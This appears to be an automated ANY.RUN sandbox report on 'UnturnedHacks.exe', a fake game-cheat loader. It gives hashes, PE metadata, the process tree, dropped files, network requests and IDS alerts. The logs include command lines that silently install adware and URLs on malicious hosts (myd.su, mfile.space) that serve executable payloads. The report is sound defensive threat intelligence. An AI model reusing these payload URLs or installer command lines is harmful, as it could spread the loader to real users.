File name: | UnturnedHacks.exe |
Full analysis: | https://app.any.run/tasks/109bc6e4-348c-4b43-89e1-94ace1a2f901 |
Verdict: | Malicious activity |
Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
Analysis date: | May 24, 2019, 22:18:11 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386, for MS Windows, PECompact2 compressed |
MD5: | 1CBD0D0C7AE0D69A5EBEEF1E81062B1C |
SHA1: | 70D7D2CC244B736D896A9E1F8057526EAA62EB50 |
SHA256: | DE3DB26B1484C6282A07C2BC2D553A55F57B807FA41BFFFEBC158D9A7BAD353B |
SSDEEP: | 49152:Tcl+6hQy8YfpY6qDfw7zu/cL2xqO5BiSwdcr7NgGb3E+y:TcY6hwYfp5L7K/LkO5B3wdc7DLty |
.exe | | | Win32 EXE PECompact compressed (v2.x) (50.1) |
---|---|---|
.exe | | | Win32 EXE PECompact compressed (generic) (35.2) |
.dll | | | Win32 Dynamic Link Library (generic) (5.5) |
.exe | | | Win32 Executable (generic) (3.8) |
.exe | | | Win16/32 Executable Delphi generic (1.7) |
MachineType: | Intel 386 or later, and compatibles |
---|---|
TimeStamp: | 2019:04:08 17:55:21+02:00 |
PEType: | PE32 |
LinkerVersion: | 2.25 |
CodeSize: | 888320 |
InitializedDataSize: | 1650688 |
UninitializedDataSize: | - |
EntryPoint: | 0xda7f4 |
OSVersion: | 5 |
ImageVersion: | - |
SubsystemVersion: | 5 |
Subsystem: | Windows GUI |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 08-Apr-2019 15:55:21 |
Magic number: | MZ |
---|---|
Bytes on last page of file: | 0x0050 |
Pages in file: | 0x0002 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x000F |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x001A |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000100 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 2 |
Time date stamp: | 08-Apr-2019 15:55:21 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
---|---|---|---|---|---|
.text | 0x00001000 | 0x00278000 | 0x0019D600 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 7.99988 |
.rsrc | 0x00279000 | 0x0000B000 | 0x0000AE00 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 4.33088 |
advapi32.dll |
kernel32.dll |
netapi32.dll |
oleaut32.dll |
shell32.dll |
user32.dll |
version.dll |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3456 | "C:\Users\admin\AppData\Local\Temp\UnturnedHacks.exe" | C:\Users\admin\AppData\Local\Temp\UnturnedHacks.exe | — | explorer.exe |
User: admin Integrity Level: MEDIUM Exit code: 3221226540 | ||||
3048 | "C:\Users\admin\AppData\Local\Temp\UnturnedHacks.exe" | C:\Users\admin\AppData\Local\Temp\UnturnedHacks.exe | explorer.exe | |
User: admin Integrity Level: HIGH Exit code: 0 | ||||
332 | "C:\Users\admin\AppData\Local\Temp\MyDiskPro\wWUxRYVNi.exe" TEw9aHR0cDovL215ZC5zdS9kLypOTj1VbnR1cm5lZEhhY2tzLmV4ZSpGRj0xMjUwMCpBUEk9KlNJWkU9MTExNzY5NipNVT1odHRwOi8vbWZpbGUuc3BhY2UvbC8qU1U9TXlEaXNrLnBybyo= | C:\Users\admin\AppData\Local\Temp\MyDiskPro\wWUxRYVNi.exe | UnturnedHacks.exe | |
User: admin Company: MyDisk.Pro Integrity Level: HIGH Description: MyDisk.Pro Version: 1.0.0.0 | ||||
1240 | "C:\Users\admin\AppData\Local\Temp\w52e3e2e5bc44.exe" --silent --install_browser_class=0 --pay_browser_class=0 "--rfr=hp.1:834408,dse.1:811570,vbm.1:811580,pult.1:811580,hp.2:834423,dse.2:811610,vbm.2:811620,pult.2:811620,any:811550,any.2:811590" "--install_callback=http://razornow.info/api_v2/callback/?guid | C:\Users\admin\AppData\Local\Temp\w52e3e2e5bc44.exe | wWUxRYVNi.exe | |
User: admin Integrity Level: HIGH Description: sputnik Exit code: 3221225547 Version: 5.1.0.194 | ||||
3716 | "C:\Users\admin\AppData\Local\Temp\w283bb2c636d8.exe" mode=s siteid=15106 campaignid=1 sourceid=106 | C:\Users\admin\AppData\Local\Temp\w283bb2c636d8.exe | wWUxRYVNi.exe | |
User: admin Company: "My Web Shield" Integrity Level: HIGH Description: My Web Shield Installation File Version: 3.0.0.0 | ||||
2800 | "C:\Users\admin\Desktop\UnturnedHacks.exe" | C:\Users\admin\Desktop\UnturnedHacks.exe | — | explorer.exe |
User: admin Company: VimeWin Integrity Level: MEDIUM Description: VimeWin Exit code: 3221226540 Version: 1.0.0.0 | ||||
3584 | "C:\Users\admin\Desktop\UnturnedHacks.exe" | C:\Users\admin\Desktop\UnturnedHacks.exe | explorer.exe | |
User: admin Company: VimeWin Integrity Level: HIGH Description: VimeWin Version: 1.0.0.0 | ||||
2604 | "C:\Windows\System32\regsvr32.exe" /s "C:\Users\admin\AppData\Local\Mail.Ru\Sputnik\ie_addon_dll.dll" | C:\Windows\System32\regsvr32.exe | w52e3e2e5bc44.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft(C) Register Server Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3696 | "C:\Program Files\My Web Shield\mweshield.exe" /Service | C:\Program Files\My Web Shield\mweshield.exe | — | w283bb2c636d8.exe |
User: admin Company: "My Web Shield" Integrity Level: HIGH Description: My Web Shield Sentinel Exit code: 0 Version: 3.0.0.0 | ||||
3156 | "C:\Program Files\My Web Shield\mweshieldup.exe" /Service | C:\Program Files\My Web Shield\mweshieldup.exe | — | w283bb2c636d8.exe |
User: admin Company: "My Web Shield" Integrity Level: HIGH Description: My Web Shield Consolidator Version: 3.0.0.0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1240 | w52e3e2e5bc44.exe | C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cookies.sqlite-shm | — | |
MD5:— | SHA256:— | |||
1240 | w52e3e2e5bc44.exe | C:\Users\admin\AppData\Local\Temp\b693-cce2-78a4-f80d\MailRu.ico | — | |
MD5:— | SHA256:— | |||
1240 | w52e3e2e5bc44.exe | C:\Users\admin\AppData\Local\Temp\45e5-dca1-60d1-e028\GoMailRu.ico | — | |
MD5:— | SHA256:— | |||
332 | wWUxRYVNi.exe | C:\Users\admin\AppData\Local\Temp\TMP48F9.tmp | — | |
MD5:— | SHA256:— | |||
1240 | w52e3e2e5bc44.exe | C:\ProgramData\Mail.Ru\Id | text | |
MD5:7853DD01A22D556EC4E67A9A601B469F | SHA256:EE0A9CE336AD917BA931D6D0B57573990A6DB4841CC1C1248BD0AD71E3146E66 | |||
1240 | w52e3e2e5bc44.exe | C:\Users\admin\AppData\Local\Mail.Ru\Sputnik\GoMailRu.ico | image | |
MD5:ED62B573B9FF118E3EC726D78C5A099F | SHA256:D8AE22194708322B6CA7C8F5686C85D41EAF847A804657ADEEF6ABCAB74B3270 | |||
3048 | UnturnedHacks.exe | C:\Users\admin\AppData\Local\Temp\MyDiskPro\wWUxRYVNi.exe | executable | |
MD5:21DDD0E26423B9FA20C27E80362AE065 | SHA256:2634CEFA72A4514435DC66FCBE8D0A6B857760E70B8038058B206C6FE0BFB51B | |||
1240 | w52e3e2e5bc44.exe | C:\Users\admin\Favorites\Искать в Интернете.url | text | |
MD5:EB08378217B4A9D27F46FA00527D778B | SHA256:B0C3586271724BE93C4BA4AF3D9A7DF05462F76B603DD7EF7E5BA4448BB7C244 | |||
1240 | w52e3e2e5bc44.exe | C:\Users\admin\AppData\Local\Mail.Ru\Tmp\DeferredTasks\metadata | binary | |
MD5:C4C6E98DD42CC8853DF86F284FB97D50 | SHA256:31DAB4984A707675868084F10BB8A64CA1ED041251164FBB0D9AED9792A3DA3D | |||
1240 | w52e3e2e5bc44.exe | C:\Users\admin\Links\Искать в Интернете.url | text | |
MD5:B72245103E7C3A59C85440E20317135D | SHA256:75CF82E4581C060A4663B6D249AB3DE840F66E0E97BBABFE5190E86AC1B72AEA |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1240 | w52e3e2e5bc44.exe | GET | 204 | 217.69.139.245:80 | http://mrds.mail.ru/update/2/version.txt?type=install&bgn=1&standalone=1&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=7&elapsed_time=0&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590 | RU | — | — | suspicious |
1240 | w52e3e2e5bc44.exe | GET | — | 217.69.139.245:80 | http://mrds.mail.ru/update/2/version.txt?type=setup_unit&id=ie_gomailru&event=done&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=13&elapsed_time=3&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590 | RU | — | — | suspicious |
1240 | w52e3e2e5bc44.exe | GET | 204 | 217.69.139.245:80 | http://mrds.mail.ru/update/2/version.txt?type=spparams&raw=--silent%20--install_browser_class%3D0%20--pay_browser_class%3D0%20%22--rfr%3Dhp.1%3A834408%2Cdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590%22%20%22--install_callback%3Dhttp%3A%2F%2Frazornow.info%2Fapi_v2%2Fcallback%2F%3Fguid&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=7&elapsed_time=0&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590 | RU | — | — | suspicious |
332 | wWUxRYVNi.exe | GET | 200 | 104.24.116.68:80 | http://myd.su/files/advertising/f47d0ad31c4c49061b9e505593e3db98.exe | US | executable | 623 Kb | malicious |
1240 | w52e3e2e5bc44.exe | GET | — | 217.69.139.245:80 | http://mrds.mail.ru/update/2/version.txt?type=setup_unit&id=fav_gomailru&event=done&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=13&elapsed_time=3&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590 | RU | — | — | suspicious |
1240 | w52e3e2e5bc44.exe | GET | 204 | 217.69.139.245:80 | http://mrds.mail.ru/update/2/version.txt?type=setup_unit&id=taskbar_mailru&event=done&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=13&elapsed_time=3&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590 | RU | — | — | suspicious |
1240 | w52e3e2e5bc44.exe | GET | 204 | 217.69.139.245:80 | http://mrds.mail.ru/update/2/version.txt?type=sp_prep&time=15466&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=14&elapsed_time=19&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590 | RU | — | — | suspicious |
1240 | w52e3e2e5bc44.exe | GET | — | 217.69.139.245:80 | http://mrds.mail.ru/update/2/version.txt?type=spnative_run&id=mrupdater&event=error&error=193&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=14&elapsed_time=15&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590 | RU | — | — | suspicious |
332 | wWUxRYVNi.exe | GET | 200 | 104.24.116.68:80 | http://myd.su/d/eyJmaWQiOiIyZjA2NmJmMCIsImtleSI6ImVhYmU2MjQ3NmE0NDg5NCJ9 | US | executable | 1.07 Mb | malicious |
332 | wWUxRYVNi.exe | POST | — | 104.27.161.171:80 | http://mfile.space/l/ | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1240 | w52e3e2e5bc44.exe | 217.69.139.122:443 | conserv.go.mail.ru | Limited liability company Mail.Ru | RU | unknown |
— | — | 217.69.139.245:80 | mrds.mail.ru | Limited liability company Mail.Ru | RU | malicious |
1240 | w52e3e2e5bc44.exe | 217.69.139.247:443 | xmlbinupdate.mail.ru | Limited liability company Mail.Ru | RU | malicious |
1240 | w52e3e2e5bc44.exe | 217.69.139.245:80 | mrds.mail.ru | Limited liability company Mail.Ru | RU | malicious |
332 | wWUxRYVNi.exe | 104.27.161.171:80 | mfile.space | Cloudflare Inc | US | shared |
1240 | w52e3e2e5bc44.exe | 94.100.180.110:443 | mailruupdater.cdnmail.ru | Limited liability company Mail.Ru | RU | suspicious |
1240 | w52e3e2e5bc44.exe | 217.69.139.245:443 | mrds.mail.ru | Limited liability company Mail.Ru | RU | malicious |
332 | wWUxRYVNi.exe | 104.24.116.68:80 | myd.su | Cloudflare Inc | US | shared |
1240 | w52e3e2e5bc44.exe | 217.69.139.110:443 | xtnmailru.cdnmail.ru | Limited liability company Mail.Ru | RU | malicious |
3716 | w283bb2c636d8.exe | 88.208.5.120:80 | mywebshield-ww1.com | DataWeb Global Group B.V. | NL | malicious |
Domain | IP | Reputation |
---|---|---|
mfile.space |
| malicious |
myd.su |
| malicious |
xmlbinupdate.mail.ru |
| shared |
conserv.go.mail.ru |
| unknown |
mrds.mail.ru |
| suspicious |
mailruupdater.cdnmail.ru |
| unknown |
xtnmailru.cdnmail.ru |
| unknown |
mywebshield-ww1.com |
| malicious |
getmywebshield.org |
| unknown |
gosoftdl.mail.ru |
| shared |
PID | Process | Class | Message |
---|---|---|---|
332 | wWUxRYVNi.exe | Misc activity | ADWARE [PTsecurity] Win32.SoftPulse.gikv |
— | — | Potentially Bad Traffic | ET DNS Query for .su TLD (Soviet Union) Often Malware Related |
332 | wWUxRYVNi.exe | Potentially Bad Traffic | ET POLICY HTTP Request to .su TLD (Soviet Union) Often Malware Related |
332 | wWUxRYVNi.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
332 | wWUxRYVNi.exe | A Network Trojan was detected | ET TROJAN HTTP Executable Download from suspicious domain with direct request/fake browser (multiple families) |
332 | wWUxRYVNi.exe | Potentially Bad Traffic | ET POLICY HTTP Request to .su TLD (Soviet Union) Often Malware Related |
332 | wWUxRYVNi.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
332 | wWUxRYVNi.exe | A Network Trojan was detected | ET TROJAN HTTP Executable Download from suspicious domain with direct request/fake browser (multiple families) |
332 | wWUxRYVNi.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
332 | wWUxRYVNi.exe | Potentially Bad Traffic | ET POLICY HTTP Request to .su TLD (Soviet Union) Often Malware Related |